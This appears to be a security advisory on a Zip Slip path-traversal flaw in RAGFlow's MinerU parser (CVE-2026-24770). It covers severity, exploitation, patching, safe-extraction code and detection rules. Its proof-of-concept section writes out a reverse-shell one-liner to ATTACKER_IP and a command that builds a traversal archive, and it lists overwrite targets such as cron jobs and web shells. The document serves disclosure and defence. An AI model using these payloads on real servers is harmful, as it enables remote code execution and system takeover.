Description
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In version 0.23.1 and possibly earlier versions, the MinerU parser contains a "Zip Slip" vulnerability, allowing an attacker to overwrite arbitrary files on the server (leading to Remote Code Execution) via a malicious ZIP archive. The MinerUParser class retrieves and extracts ZIP files from an external source (mineru_server_url). The extraction logic in `_extract_zip_no_root` fails to sanitize filenames within the ZIP archive. Commit 64c75d558e4a17a4a48953b4c201526431d8338f contains a patch for the issue.
EPSS Score: 0%
Comprehensive Technical Analysis of EUVD-2026-4714 (CVE-2026-24770) – "Zip Slip" Vulnerability in RAGFlow
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
EUVD-2026-4714 (CVE-2026-24770) is a critical "Zip Slip" vulnerability in RAGFlow, an open-source Retrieval-Augmented Generation (RAG) engine developed by Infiniflow. The flaw resides in the MinerU parser, specifically in the _extract_zip_no_root method, which fails to properly sanitize filenames within ZIP archives during extraction. This allows an attacker to overwrite arbitrary files on the server, leading to Remote Code Execution (RCE).
Severity Evaluation (CVSS v3.1: 9.8 – Critical)
The CVSS v3.1 base score of 9.8 reflects the following key metrics:
- Attack Vector (AV:N): Exploitable remotely over a network.
- Attack Complexity (AC:L): Low complexity; no special conditions required.
- Privileges Required (PR:N): No authentication needed.
- User Interaction (UI:N): No user interaction required.
- Scope (S:U): Impact confined to the vulnerable component.
- Confidentiality (C:H): High impact (code execution after a file overwrite exposes any data the service can read).
- Integrity (I:H): High impact (arbitrary file overwrite).
- Availability (A:H): High impact (potential system compromise).
This classification aligns with critical vulnerabilities that enable unauthenticated RCE, posing severe risks to affected systems.
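The 9.8 figure can be reproduced from the metrics listed above. The following is a minimal sketch of the CVSS v3.1 base-score arithmetic for the scope-unchanged case only. The function names are illustrative, and the weights are the constants published in the CVSS v3.1 specification.

```python
import math

# Metric weights from the CVSS v3.1 specification (Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place as defined in CVSS v3.1 Appendix A."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged(vector):
    """Compute the base score for a vector such as 'AV:N/AC:L/.../A:H'."""
    metrics = dict(part.split(":") for part in vector.split("/"))
    if metrics.get("S") != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score_scope_unchanged("AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"))
```

For this vector the exploitability sub-score is about 3.89 and the impact sub-score about 5.87. They sum to roughly 9.76, which rounds up to 9.8.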
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability arises from improper path traversal validation when extracting ZIP archives. An attacker can craft a malicious ZIP file containing:
- Relative path traversal sequences (e.g., `../../../etc/passwd`).
- Absolute paths (e.g., `/etc/cron.d/evil`).
- Symlinks pointing to sensitive files.
When the MinerUParser processes such a ZIP file (retrieved from mineru_server_url), the _extract_zip_no_root method fails to sanitize filenames, allowing:
- Arbitrary File Overwrite: Attacker-controlled files are written to unintended locations.
- Remote Code Execution (RCE):
  - Overwriting cron jobs (`/etc/cron.d/`).
  - Modifying web server configurations (e.g., `.htaccess`, `nginx.conf`).
  - Injecting malicious scripts (e.g., `/var/www/html/shell.php`).
  - Replacing system binaries (e.g., `/usr/bin/sudo`).
- Privilege Escalation: If the RAGFlow service runs with elevated privileges (e.g., `root`), the attacker gains full system control.
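Why a missing filename check leads to writes outside the target directory follows from how path joining behaves. The sketch below is illustrative and does not reproduce RAGFlow's code. The directory `/srv/ragflow/out` and both helper names are hypothetical. It uses `posixpath` so the results are the same on any platform.

```python
import posixpath


def naive_target(dest_dir, member_name):
    """Join an archive member name onto the destination without validation."""
    return posixpath.normpath(posixpath.join(dest_dir, member_name))


def escapes(dest_dir, member_name):
    """Return True if the joined path falls outside dest_dir."""
    base = posixpath.normpath(dest_dir)
    target = naive_target(base, member_name)
    return posixpath.commonpath([base, target]) != base


DEST = "/srv/ragflow/out"  # hypothetical extraction directory

for name in ("images/fig1.png", "../../../etc/passwd", "/etc/cron.d/evil"):
    print(name, "->", naive_target(DEST, name), "escapes:", escapes(DEST, name))
```

The relative entry climbs out of the directory through its `..` components, and the absolute entry discards the destination entirely, because `join` restarts from any component that begins with `/`.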
Exploitation Steps
- Host a Malicious ZIP File:
  - Craft a ZIP archive with a file named `../../../tmp/exploit.sh`.
  - Include a payload (e.g., reverse shell, web shell).
- Trigger ZIP Extraction:
  - The attacker forces RAGFlow to fetch the ZIP from `mineru_server_url`.
  - The vulnerable `_extract_zip_no_root` method processes the archive.
- Achieve RCE:
  - The malicious file is written to the target location.
  - Execution is triggered (e.g., via cron, web request, or service restart).
Proof-of-Concept (PoC) Considerations
- A minimal PoC could involve:
      echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > payload.sh
      zip malicious.zip ../../../tmp/payload.sh
- The attacker then hosts `malicious.zip` on a controlled server and manipulates `mineru_server_url` to fetch it.
3. Affected Systems and Software Versions
Vulnerable Software
- Product: RAGFlow (open-source RAG engine)
- Vendor: Infiniflow
- Affected Versions: 0.23.1 and possibly earlier versions that include the MinerU parser
- Component: MinerUParser (specifically the `_extract_zip_no_root` method)
Attack Surface
- Default Installations: Any RAGFlow deployment using MinerU for ZIP extraction.
- Cloud/On-Premise: Both cloud-based and self-hosted instances are vulnerable.
- Integration Risks: If RAGFlow is embedded in larger AI/ML pipelines, the attack surface expands.
4. Recommended Mitigation Strategies
Immediate Actions
- Apply the Patch:
  - Upgrade to the latest version of RAGFlow (post-commit `64c75d558e4a17a4a48953b4c201526431d8338f`).
  - The patch introduces proper path sanitization in `_extract_zip_no_root`.
- Temporary Workarounds (if patching is delayed):
  - Disable MinerU Parser: If not critical, disable ZIP extraction functionality.
  - Network-Level Protections:
    - Restrict `mineru_server_url` to trusted sources via firewall rules.
    - Implement rate limiting to prevent mass exploitation attempts.
  - File System Hardening:
    - Run RAGFlow with least-privilege permissions (e.g., non-root user).
    - Use chroot/jail environments to limit file system access.
    - Enable SELinux/AppArmor to restrict file operations.
- Input Validation:
  - Manually validate ZIP filenames before extraction (e.g., reject entries that contain `../` components, begin with `/`, or are symlinks).
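The manual validation step could be sketched as follows. This is a minimal example under stated assumptions: the function name `unsafe_members` is hypothetical, and symlinks are recognised through the Unix mode bits that archivers store in the upper 16 bits of each entry's `external_attr`.

```python
import stat
import zipfile
from pathlib import PurePosixPath


def unsafe_members(archive: zipfile.ZipFile) -> list[str]:
    """Return names of entries that should be rejected before extraction."""
    flagged = []
    for info in archive.infolist():
        # Treat backslashes as separators so Windows-style names are covered.
        name = info.filename.replace("\\", "/")
        path = PurePosixPath(name)
        unix_mode = info.external_attr >> 16
        has_drive = len(name) > 1 and name[1] == ":"
        if (
            path.is_absolute()
            or has_drive
            or ".." in path.parts
            or stat.S_ISLNK(unix_mode)
        ):
            flagged.append(info.filename)
    return flagged
```

A caller would open the downloaded archive with `zipfile.ZipFile`, and refuse to extract anything if the returned list is non-empty.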
Long-Term Security Recommendations
- Secure Coding Practices:
  - Use extraction routines that sanitize member names (e.g., Python’s `zipfile.ZipFile.extract()` and `extractall()`, which strip absolute prefixes and `..` components), and add explicit path validation wherever files are written manually.
  - Implement sandboxing for untrusted file operations.
- Dependency Management:
  - Regularly audit third-party dependencies (e.g., MinerU) for vulnerabilities.
- Runtime Protections:
  - Deploy Web Application Firewalls (WAFs) to detect path traversal attempts.
  - Use File Integrity Monitoring (FIM) to detect unauthorized file changes.
- Incident Response Planning:
  - Develop a playbook for RCE incidents involving RAGFlow.
  - Monitor for unusual file modifications or outbound connections from the server.
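File Integrity Monitoring, as recommended above, reduces to comparing a trusted baseline of file hashes with the current state. The sketch below is a simplified illustration rather than a replacement for a dedicated FIM product. The function names are hypothetical.

```python
import hashlib
from pathlib import Path


def snapshot(root):
    """Map each regular file under root (relative path) to its SHA-256 digest."""
    digests = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and not path.is_symlink():
            relative = path.relative_to(root).as_posix()
            digests[relative] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_snapshots(before, after):
    """Report files added, removed, or modified between two snapshots."""
    shared = before.keys() & after.keys()
    return {
        "added": sorted(after.keys() - before.keys()),
        "removed": sorted(before.keys() - after.keys()),
        "modified": sorted(name for name in shared if before[name] != after[name]),
    }
```

The baseline should be taken on a known-good system and stored where the RAGFlow process cannot write. Otherwise an attacker with file-overwrite capability could alter it as well.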
5. Impact on the European Cybersecurity Landscape
Broader Implications for EU Organizations
- Critical Infrastructure Risks:
  - RAGFlow is used in AI-driven decision systems, including healthcare, finance, and government applications.
  - A successful RCE could lead to data breaches, service disruption, or espionage.
- Compliance and Regulatory Concerns:
  - GDPR (Art. 32): Failure to patch may result in non-compliance with security obligations.
  - NIS2 Directive: Critical entities must ensure supply chain security, including open-source components.
  - ENISA Guidelines: The vulnerability aligns with ENISA’s top threats (2023), particularly supply chain attacks and RCE exploits.
- Supply Chain Risks:
  - Many EU organizations integrate open-source AI tools like RAGFlow into their workflows.
  - A single unpatched instance could serve as a lateral movement vector in a larger attack.
- Threat Actor Interest:
  - APT groups (e.g., Russian/Chinese state-sponsored actors) may exploit this for espionage.
  - Ransomware operators could use RCE to deploy locker malware.
EU-Specific Mitigation Strategies
- CERT-EU Coordination: Organizations should monitor CERT-EU advisories for updates.
- National CSIRTs: Engage with national cybersecurity agencies (e.g., ANSSI, BSI, NCSC) for guidance.
- Open-Source Security Initiatives: Support initiatives that improve open-source security (e.g., OpenSSF, Germany’s Sovereign Tech Fund).
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability stems from insufficient path sanitization in the _extract_zip_no_root method of the MinerUParser class. Key issues:
- Lack of Path Normalization:
  - The code does not resolve relative paths (e.g., `../../`) before extraction.
- No Symlink Handling:
  - ZIP archives containing symlinks can bypass directory restrictions.
- Unrestricted File Permissions:
  - Extracted files inherit the process’s permissions, potentially allowing writes to sensitive locations.
Patch Analysis (Commit 64c75d558e4a17a4a48953b4c201526431d8338f)
The fix introduces:
- Path Sanitization:
  - Uses `os.path.abspath()` and `os.path.realpath()` to resolve paths.
  - Rejects files attempting to traverse outside the extraction directory.
- Symlink Detection:
  - Checks for symlinks before extraction.
- Strict Directory Validation:
  - Ensures extracted files remain within the intended directory.
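The three checks described above can be combined into one extraction routine. The sketch below is not the code from commit 64c75d558e4a17a4a48953b4c201526431d8338f, which is not reproduced here. It is an illustrative implementation of the same idea, and the name `safe_extract` is hypothetical. All entries are validated before anything is written, so a rejected archive leaves no partial output.

```python
import os
import shutil
import stat
import zipfile


def safe_extract(zip_source, dest_dir):
    """Extract an archive only if every entry stays inside dest_dir."""
    dest_root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(zip_source) as archive:
        planned = []
        # Pass 1: validate every entry before touching the file system.
        for info in archive.infolist():
            if stat.S_ISLNK(info.external_attr >> 16):
                raise ValueError(f"symlink entry rejected: {info.filename!r}")
            target = os.path.realpath(os.path.join(dest_root, info.filename))
            if os.path.commonpath([dest_root, target]) != dest_root:
                raise ValueError(f"entry escapes destination: {info.filename!r}")
            planned.append((info, target))

        # Pass 2: write the validated entries.
        os.makedirs(dest_root, exist_ok=True)
        written = []
        for info, target in planned:
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with archive.open(info) as src, open(target, "wb") as dst:
                shutil.copyfileobj(src, dst)
            written.append(target)
    return written
```

Comparing with `os.path.commonpath` rather than a plain string prefix avoids accepting a sibling directory such as `out2` when the destination is `out`.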
Detection and Forensics
- Indicators of Compromise (IoCs):
  - Unusual files in `/tmp/`, `/var/www/`, or `/etc/`.
  - Suspicious cron jobs (`/etc/cron.d/`).
  - Unexpected outbound connections from the RAGFlow server.
- Log Analysis:
  - Check for ZIP extraction events in application logs.
  - Monitor for failed path traversal attempts (if logging is enabled).
- Memory Forensics:
  - Use Volatility or Rekall to detect injected payloads in memory.
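As a first triage step for the file-based indicators above, an analyst might list files modified since the suspected time of compromise. The sketch below assumes modification times have not been tampered with, which an attacker with write access can defeat, so it supplements hash-based checks and does not replace them. The function name is hypothetical.

```python
import os


def recently_modified(roots, since_epoch):
    """List (path, mtime) for files under roots modified at or after since_epoch."""
    hits = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    # lstat avoids following symlinks planted by an attacker.
                    mtime = os.lstat(path).st_mtime
                except OSError:
                    continue  # file vanished or is unreadable; skip it
                if mtime >= since_epoch:
                    hits.append((path, mtime))
    # Newest first, so the most recent changes are reviewed first.
    return sorted(hits, key=lambda item: item[1], reverse=True)
```

Typical roots would be the directories named in the indicator list, for example `["/tmp", "/var/www", "/etc/cron.d"]`, with `since_epoch` set from the earliest suspicious log entry.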
Exploitation Detection Rules
- YARA Rule (for malicious ZIP detection):
      rule ZipSlip_RAGFlow {
          meta:
              description = "Detects ZIP files with path traversal in RAGFlow"
              reference = "CVE-2026-24770"
          strings:
              $traversal1 = "../../"
              $traversal2 = "..\\..\\"
              // A bare "/" string is omitted: it occurs in almost every ZIP
              // and would make the rule fire on benign archives.
          condition:
              // 0x04034b50 is the ZIP local file header magic "PK\x03\x04"
              uint32(0) == 0x04034b50 and any of them
      }
- Snort/Suricata Rule (for network detection):
      alert tcp any any -> $RAGFLOW_SERVERS $HTTP_PORTS (msg:"Possible CVE-2026-24770 Exploitation - ZIP Slip in RAGFlow"; flow:to_server,established; content:".zip"; http_uri; content:"../../"; within:100; classtype:attempted-admin; sid:1000001; rev:1;)
Conclusion
EUVD-2026-4714 (CVE-2026-24770) represents a critical RCE vulnerability in RAGFlow due to improper ZIP extraction handling. The flaw is easily exploitable by unauthenticated attackers, posing severe risks to European organizations leveraging AI-driven systems. Immediate patching, network-level protections, and runtime hardening are essential to mitigate this threat. Given the broad adoption of RAGFlow in EU critical infrastructure, this vulnerability warrants urgent attention from security teams, CERTs, and regulatory bodies.
Recommended Next Steps:
- Patch immediately (upgrade to the latest RAGFlow version).
- Audit all RAGFlow deployments for signs of compromise.
- Implement compensating controls (WAF, FIM, least privilege).
- Monitor for exploitation attempts via SIEM/log analysis.